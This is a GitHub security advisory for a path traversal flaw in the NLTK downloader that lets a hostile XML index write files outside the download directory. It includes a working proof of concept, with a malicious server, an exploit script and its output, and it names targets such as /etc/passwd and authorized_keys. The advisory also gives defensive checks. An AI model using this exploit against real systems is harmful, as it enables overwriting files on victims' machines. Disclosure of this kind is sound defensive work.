GHSA-469J-VMHF-R6V7

Vulnerability from github – Published: 2026-03-19 12:42 – Updated: 2026-03-25 18:21
Summary
NLTK has a Downloader Path Traversal Vulnerability (AFO) - Arbitrary File Overwrite
Details

Vulnerability Description

The NLTK downloader does not validate the subdir and id attributes when processing remote XML index files. An attacker who controls the remote XML index server can supply values containing path traversal sequences (such as ../), which can lead to:

  1. Arbitrary Directory Creation: Create directories at arbitrary locations in the file system
  2. Arbitrary File Creation: Create arbitrary files
  3. Arbitrary File Overwrite: Overwrite critical system files (such as /etc/passwd, ~/.ssh/authorized_keys, etc.)

Vulnerability Principle

Key Code Locations

1. XML Parsing Without Validation (nltk/downloader.py:253)

self.filename = os.path.join(subdir, id + ext)
  • subdir and id are taken directly from XML attributes without any validation

2. Path Construction Without Checks (nltk/downloader.py:679)

filepath = os.path.join(download_dir, info.filename)
  • Uses info.filename directly, which may contain path traversal sequences

3. Unrestricted Directory Creation (nltk/downloader.py:687)

os.makedirs(os.path.join(download_dir, info.subdir), exist_ok=True)
  • Can create arbitrary directories outside the download directory

4. File Writing Without Protection (nltk/downloader.py:695)

with open(filepath, "wb") as outfile:
  • Can write to arbitrary locations in the file system
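
The combined effect of these four locations can be seen without touching the file system. The sketch below mirrors the two os.path.join calls using posixpath, so the result is the same on any platform. The function names and the /tmp/nltk_data download directory are illustrative assumptions, not NLTK code, and normpath only resolves ".." lexically (it does not follow symlinks).

```python
import posixpath


def package_filename(subdir: str, pkg_id: str, ext: str) -> str:
    """Mirror of the filename construction: join(subdir, id + ext)."""
    return posixpath.join(subdir, pkg_id + ext)


def resolved_target(download_dir: str, filename: str) -> str:
    """Join as the downloader does, then normalize to show the real target."""
    return posixpath.normpath(posixpath.join(download_dir, filename))


# A well-formed entry stays inside the download directory.
benign = resolved_target(
    "/tmp/nltk_data", package_filename("corpora", "brown", ".zip")
)

# A hostile entry climbs out of it: each "../" removes one directory level.
hostile = resolved_target(
    "/tmp/nltk_data", package_filename("../../etc", "passwd", ".zip")
)

print(benign)   # /tmp/nltk_data/corpora/brown.zip
print(hostile)  # /etc/passwd.zip
```

Where the hostile path finally lands depends on how deep download_dir is, which is why the PoC further down uses a long run of "../" segments to reach the root regardless of depth.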

Attack Chain

1. Attacker controls remote XML index server
   ↓
2. Provides malicious XML: <package id="passwd" subdir="../../etc" .../>
   ↓
3. Victim executes: downloader.download('passwd')
   ↓
4. Package.fromxml() creates object, filename = "../../etc/passwd.zip"
   ↓
5. _download_package() constructs path: download_dir + "../../etc/passwd.zip"
   ↓
6. os.makedirs() creates directory: download_dir + "../../etc"
   ↓
7. open(filepath, "wb") writes file to /etc/passwd.zip
   ↓
8. A file outside the download directory is created, or overwritten if it already exists
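
One common way to break this chain is to resolve the final path and refuse anything that falls outside the download directory before creating directories or opening files. The following is a minimal sketch of that idea, not the fix applied upstream; safe_join is a hypothetical helper name, and the temporary directory stands in for a real download_dir.

```python
import os
import tempfile


def safe_join(base_dir: str, *parts: str) -> str:
    """Join parts under base_dir; raise ValueError if the result escapes it."""
    base = os.path.realpath(base_dir)
    # realpath collapses ".." segments and follows symlinks.
    target = os.path.realpath(os.path.join(base, *parts))
    # commonpath equals base only when target is base or lies beneath it.
    if os.path.commonpath([base, target]) != base:
        raise ValueError(f"path escapes download directory: {target!r}")
    return target


download_dir = tempfile.mkdtemp(prefix="nltk_safe_")

# A normal package path is accepted and stays under download_dir.
inside = safe_join(download_dir, "corpora", "brown.zip")

# The values from the attack chain are rejected before any write happens.
try:
    safe_join(download_dir, "../../etc", "passwd.zip")
    escaped = True
except ValueError:
    escaped = False

print(inside)
print("traversal accepted:", escaped)
```

Checking the resolved path rather than searching the string for "../" also covers absolute subdir values, since os.path.join discards the base when a later component is absolute.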

Impact Scope

  1. System File Overwrite

Reproduction Steps

Environment Setup

  1. Install NLTK
pip install nltk
  2. Prepare malicious server and exploit script (see PoC section)

Reproduction Process

Step 1: Start malicious server

python3 malicious_server.py

Step 2: Run exploit script

python3 exploit_vulnerability.py

Step 3: Verify results

ls -la /tmp/test_file.zip

Proof of Concept

Malicious Server (malicious_server.py)

#!/usr/bin/env python3
"""Malicious HTTP Server - Provides XML index with path traversal"""
import os
import tempfile
import zipfile
from http.server import HTTPServer, BaseHTTPRequestHandler

# Create temporary directory
server_dir = tempfile.mkdtemp(prefix="nltk_malicious_")

# Create malicious XML (contains path traversal)
malicious_xml = """<?xml version="1.0"?>
<nltk_data>
  <packages>
    <package id="test_file" subdir="../../../../../../../../../tmp" 
             url="http://127.0.0.1:8888/test.zip" 
             size="100" unzipped_size="100" unzip="0"/>
  </packages>
</nltk_data>
"""

# Save files
with open(os.path.join(server_dir, "malicious_index.xml"), "w") as f:
    f.write(malicious_xml)

with zipfile.ZipFile(os.path.join(server_dir, "test.zip"), "w") as zf:
    zf.writestr("test.txt", "Path traversal attack!")

# HTTP Handler
class Handler(BaseHTTPRequestHandler):
    def do_GET(self):
        if self.path == '/malicious_index.xml':
            self.send_response(200)
            self.send_header('Content-type', 'application/xml')
            self.end_headers()
            with open(os.path.join(server_dir, 'malicious_index.xml'), 'rb') as f:
                self.wfile.write(f.read())
        elif self.path == '/test.zip':
            self.send_response(200)
            self.send_header('Content-type', 'application/zip')
            self.end_headers()
            with open(os.path.join(server_dir, 'test.zip'), 'rb') as f:
                self.wfile.write(f.read())
        else:
            self.send_response(404)
            self.end_headers()

    def log_message(self, format, *args):
        pass

# Start server
if __name__ == "__main__":
    port = 8888
    server = HTTPServer(("0.0.0.0", port), Handler)
    print(f"Malicious server started: http://127.0.0.1:{port}/malicious_index.xml")
    print("Press Ctrl+C to stop")
    try:
        server.serve_forever()
    except KeyboardInterrupt:
        print("\nServer stopped")

Exploit Script (exploit_vulnerability.py)

#!/usr/bin/env python3
"""AFO Vulnerability Exploit Script"""
import os
import tempfile

def exploit(server_url="http://127.0.0.1:8888/malicious_index.xml"):
    download_dir = tempfile.mkdtemp(prefix="nltk_exploit_")
    print(f"Download directory: {download_dir}")

    # Exploit vulnerability
    from nltk.downloader import Downloader
    downloader = Downloader(server_index_url=server_url, download_dir=download_dir)
    downloader.download("test_file", quiet=True)

    # Check results
    expected_path = "/tmp/test_file.zip"
    if os.path.exists(expected_path):
        print(f"\n✗ Exploit successful! File written to: {expected_path}")
        print("✗ Path traversal attack successful!")
    else:
        print("\n? File not found, download may have failed")

if __name__ == "__main__":
    exploit()

Execution Results

✗ Exploit successful! File written to: /tmp/test_file.zip
✗ Path traversal attack successful!
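
An index such as the one served by the PoC can also be screened before it is used. The sketch below parses an index document and flags package entries whose id or subdir is absolute or contains a ".." component. The helper names (is_suspicious, audit_index) and the sample index are hypothetical, and this is an illustration of the check rather than part of NLTK.

```python
import xml.etree.ElementTree as ET
from pathlib import PurePosixPath, PureWindowsPath


def is_suspicious(value: str) -> bool:
    """Flag absolute paths, drive prefixes, and any '..' component."""
    # Check under both POSIX and Windows rules so "\\" separators are caught.
    for flavour in (PurePosixPath, PureWindowsPath):
        path = flavour(value)
        if path.is_absolute() or path.drive or ".." in path.parts:
            return True
    return False


def audit_index(xml_text: str) -> list[tuple[str, str]]:
    """Return (id, subdir) pairs for package entries that look like traversal."""
    root = ET.fromstring(xml_text)
    flagged = []
    for pkg in root.iter("package"):
        pkg_id = pkg.get("id", "")
        subdir = pkg.get("subdir", "")
        # An id should be a single path component, so separators are rejected.
        bad_id = is_suspicious(pkg_id) or "/" in pkg_id or "\\" in pkg_id
        if bad_id or is_suspicious(subdir):
            flagged.append((pkg_id, subdir))
    return flagged


sample = """<nltk_data>
  <packages>
    <package id="brown" subdir="corpora" url="http://127.0.0.1:8888/brown.zip"/>
    <package id="test_file" subdir="../../../tmp" url="http://127.0.0.1:8888/test.zip"/>
  </packages>
</nltk_data>"""

flagged = audit_index(sample)
print(flagged)  # [('test_file', '../../../tmp')]
```

A screen like this complements, but does not replace, a containment check on the final resolved path at write time.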

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "nltk"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "3.9.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-33236"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-19T12:42:42Z",
    "nvd_published_at": "2026-03-20T23:16:47Z",
    "severity": "HIGH"
  },
  "details": "## Vulnerability Description\n\nThe NLTK downloader does not validate the `subdir` and `id` attributes when processing remote XML index files. Attackers can control a remote XML index server to provide malicious values containing path traversal sequences (such as `../`), which can lead to:\n\n1. **Arbitrary Directory Creation**: Create directories at arbitrary locations in the file system\n2. **Arbitrary File Creation**: Create arbitrary files\n3. **Arbitrary File Overwrite**: Overwrite critical system files (such as `/etc/passwd`, `~/.ssh/authorized_keys`, etc.)\n\n## Vulnerability Principle\n\n### Key Code Locations\n\n**1. XML Parsing Without Validation** (`nltk/downloader.py:253`)\n```python\nself.filename = os.path.join(subdir, id + ext)\n```\n- `subdir` and `id` are directly from XML attributes without any validation\n\n**2. Path Construction Without Checks** (`nltk/downloader.py:679`)\n```python\nfilepath = os.path.join(download_dir, info.filename)\n```\n- Directly uses `filename` which may contain path traversal\n\n**3. Unrestricted Directory Creation** (`nltk/downloader.py:687`)\n```python\nos.makedirs(os.path.join(download_dir, info.subdir), exist_ok=True)\n```\n- Can create arbitrary directories outside the download directory\n\n**4. File Writing Without Protection** (`nltk/downloader.py:695`)\n```python\nwith open(filepath, \"wb\") as outfile:\n```\n- Can write to arbitrary locations in the file system\n\n### Attack Chain\n\n```\n1. Attacker controls remote XML index server\n   \u2193\n2. Provides malicious XML: \u003cpackage id=\"passwd\" subdir=\"../../etc\" .../\u003e\n   \u2193\n3. Victim executes: downloader.download(\u0027passwd\u0027)\n   \u2193\n4. Package.fromxml() creates object, filename = \"../../etc/passwd.zip\"\n   \u2193\n5. _download_package() constructs path: download_dir + \"../../etc/passwd.zip\"\n   \u2193\n6. os.makedirs() creates directory: download_dir + \"../../etc\"\n   \u2193\n7. 
open(filepath, \"wb\") writes file to /etc/passwd.zip\n   \u2193\n8. System file is overwritten!\n```\n\n## Impact Scope\n1. **System File Overwrite**\n\n## Reproduction Steps\n\n### Environment Setup\n\n1. Install NLTK\n```bash\npip install nltk\n```\n\n2. Prepare malicious server and exploit script (see PoC section)\n\n### Reproduction Process\n\n**Step 1: Start malicious server**\n```bash\npython3 malicious_server.py\n```\n\n**Step 2: Run exploit script**\n```bash\npython3 exploit_vulnerability.py\n```\n\n**Step 3: Verify results**\n```bash\nls -la /tmp/test_file.zip\n```\n\n## Proof of Concept\n\n### Malicious Server (malicious_server.py)\n\n```python\n#!/usr/bin/env python3\n\"\"\"Malicious HTTP Server - Provides XML index with path traversal\"\"\"\nimport os\nimport tempfile\nimport zipfile\nfrom http.server import HTTPServer, BaseHTTPRequestHandler\n\n# Create temporary directory\nserver_dir = tempfile.mkdtemp(prefix=\"nltk_malicious_\")\n\n# Create malicious XML (contains path traversal)\nmalicious_xml = \"\"\"\u003c?xml version=\"1.0\"?\u003e\n\u003cnltk_data\u003e\n  \u003cpackages\u003e\n    \u003cpackage id=\"test_file\" subdir=\"../../../../../../../../../tmp\" \n             url=\"http://127.0.0.1:8888/test.zip\" \n             size=\"100\" unzipped_size=\"100\" unzip=\"0\"/\u003e\n  \u003c/packages\u003e\n\u003c/nltk_data\u003e\n\"\"\"\n\n# Save files\nwith open(os.path.join(server_dir, \"malicious_index.xml\"), \"w\") as f:\n    f.write(malicious_xml)\n\nwith zipfile.ZipFile(os.path.join(server_dir, \"test.zip\"), \"w\") as zf:\n    zf.writestr(\"test.txt\", \"Path traversal attack!\")\n\n# HTTP Handler\nclass Handler(BaseHTTPRequestHandler):\n    def do_GET(self):\n        if self.path == \u0027/malicious_index.xml\u0027:\n            self.send_response(200)\n            self.send_header(\u0027Content-type\u0027, \u0027application/xml\u0027)\n            self.end_headers()\n            with open(os.path.join(server_dir, 
\u0027malicious_index.xml\u0027), \u0027rb\u0027) as f:\n                self.wfile.write(f.read())\n        elif self.path == \u0027/test.zip\u0027:\n            self.send_response(200)\n            self.send_header(\u0027Content-type\u0027, \u0027application/zip\u0027)\n            self.end_headers()\n            with open(os.path.join(server_dir, \u0027test.zip\u0027), \u0027rb\u0027) as f:\n                self.wfile.write(f.read())\n        else:\n            self.send_response(404)\n            self.end_headers()\n    \n    def log_message(self, format, *args):\n        pass\n\n# Start server\nif __name__ == \"__main__\":\n    port = 8888\n    server = HTTPServer((\"0.0.0.0\", port), Handler)\n    print(f\"Malicious server started: http://127.0.0.1:{port}/malicious_index.xml\")\n    print(\"Press Ctrl+C to stop\")\n    try:\n        server.serve_forever()\n    except KeyboardInterrupt:\n        print(\"\\nServer stopped\")\n```\n\n### Exploit Script (exploit_vulnerability.py)\n\n```python\n#!/usr/bin/env python3\n\"\"\"AFO Vulnerability Exploit Script\"\"\"\nimport os\nimport tempfile\n\ndef exploit(server_url=\"http://127.0.0.1:8888/malicious_index.xml\"):\n    download_dir = tempfile.mkdtemp(prefix=\"nltk_exploit_\")\n    print(f\"Download directory: {download_dir}\")\n    \n    # Exploit vulnerability\n    from nltk.downloader import Downloader\n    downloader = Downloader(server_index_url=server_url, download_dir=download_dir)\n    downloader.download(\"test_file\", quiet=True)\n    \n    # Check results\n    expected_path = \"/tmp/test_file.zip\"\n    if os.path.exists(expected_path):\n        print(f\"\\n\u2717 Exploit successful! File written to: {expected_path}\")\n        print(f\"\u2717 Path traversal attack successful!\")\n    else:\n        print(f\"\\n? File not found, download may have failed\")\n\nif __name__ == \"__main__\":\n    exploit()\n```\n\n### Execution Results\n\n```\n\u2717 Exploit successful! 
File written to: /tmp/test_file.zip\n\u2717 Path traversal attack successful!\n```",
  "id": "GHSA-469j-vmhf-r6v7",
  "modified": "2026-03-25T18:21:27Z",
  "published": "2026-03-19T12:42:42Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/nltk/nltk/security/advisories/GHSA-469j-vmhf-r6v7"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33236"
    },
    {
      "type": "WEB",
      "url": "https://github.com/nltk/nltk/commit/89fe2ec2c6bae6e2e7a46dad65cc34231976ed8a"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/nltk/nltk"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "NLTK has a Downloader Path Traversal Vulnerability (AFO) - Arbitrary File Overwrite"
}

